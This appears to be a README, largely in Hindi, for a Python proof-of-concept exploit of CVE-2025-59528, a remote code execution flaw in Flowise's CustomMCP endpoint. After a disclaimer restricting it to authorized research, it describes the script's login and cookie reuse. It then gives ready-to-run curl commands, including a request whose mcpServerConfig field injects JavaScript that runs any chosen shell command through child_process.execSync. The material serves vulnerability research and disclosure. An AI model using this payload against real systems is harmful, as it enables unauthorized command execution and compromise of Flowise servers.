
CVE-2025-59528 Proof of Concept
Python प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट Flowise CustomMCP RCE पथ को POST /api/v1/node-load-method/customMCP के माध्यम से ट्रिगर करने के लिए।
⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए। इस टूल को उन सिस्टम्स के विरुद्ध चलाना जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है, अवैध है।
im-soohyun (Kim SooHyun)CVE-2025-59528 के लिए PoC3.0.53.0.6poc.py: मशीन URL/IP, बेयर होस्ट/IP उपयोग होने पर वैकल्पिक प्रोटोकॉल, ईमेल, पासवर्ड, और कमांड मांगता है; लॉग इन करता है, कुकीज़ का पुन: उपयोग करता है, फिर एक तैयार किया गया CustomMCP अनुरोध भेजता है और HTTP स्थिति, हेडर, और प्रतिक्रिया निकाय को curl -i के समान प्रिंट करता है।चलाएँ:
python3 poc.py
फिर प्रदान करें:
10.10.11.10, http://10.10.11.10, या https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"<[email protected]>","password":"<password>"}'
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
-d '{
"loadMethod":"listActions",
"inputs":{
"mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
}
}'